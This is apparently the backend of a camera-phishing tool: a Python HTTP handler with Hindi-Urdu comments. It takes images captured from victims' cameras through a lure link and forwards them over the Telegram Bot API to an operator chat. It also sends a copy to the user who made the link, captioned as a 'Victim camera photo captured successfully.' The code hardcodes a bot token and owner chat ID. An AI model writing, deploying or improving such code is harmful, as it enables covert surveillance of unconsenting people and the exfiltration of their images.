import json
import base64
import requests
from urllib.parse import urlparse, parse_qs
from http.server import BaseHTTPRequestHandler

BOT_TOKEN = "8857558695:AAGOlJ_9PzeyvaOku_2_-MxjdbZJILC1cQI"
OWNER_CHAT_ID = 6478868514

class handler(BaseHTTPRequestHandler):
    def do_POST(self):
        try:
            # 1. URL se target user_id (id) nikalein jo bot ne link mein bheji thi
            parsed_path = urlparse(self.path)
            query_params = parse_qs(parsed_path.query)
            target_user_id = query_params.get('id', [None])[0]

            content_length = int(self.headers.get('Content-Length', 0))
            post_data = self.rfile.read(content_length)
            data = json.loads(post_data.decode('utf-8'))

            image_data = data.get('image')
            if image_data:
                header, encoded = image_data.split(",", 1)
                image_bytes = base64.b64decode(encoded)

                # Telegram API URL
                url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendPhoto"

                # 2. Photo Admin (Aapke) ke paas bhejein
                admin_payload = {
                    'chat_id': OWNER_CHAT_ID,
                    'caption': f"📸 **Admin Log:** Target Camera Captured!\n👤 Generated by User ID: `{target_user_id}`",
                    'parse_mode': 'Markdown'
                }
                files = {'photo': ('captured.jpg', image_bytes)}
                requests.post(url, data=admin_payload, files=files)

                # 3. Photo Target User ke paas bhi bhejein (agar user_id mojood ho)
                if target_user_id:
                    user_payload = {
                        'chat_id': target_user_id,
                        'caption': "🔥 **Success!** Victim camera photo captured successfully via your link.",
                        'parse_mode': 'Markdown'
                    }
                    # Dubara files send karne ke liye bytes ko re-open ya reuse karna padta hai
                    files_user = {'photo': ('captured.jpg', image_bytes)}
                    requests.post(url, data=user_payload, files=files_user)

            self.send_response(200)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            self.wfile.write(json.dumps({"status": "success"}).encode('utf-8'))

        except Exception as e:
            self.send_response(500)
            self.send_header('Content-Type', 'application/json')
            self.end_headers()
            self.wfile.write(json.dumps({"error": str(e)}).encode('utf-8'))
            
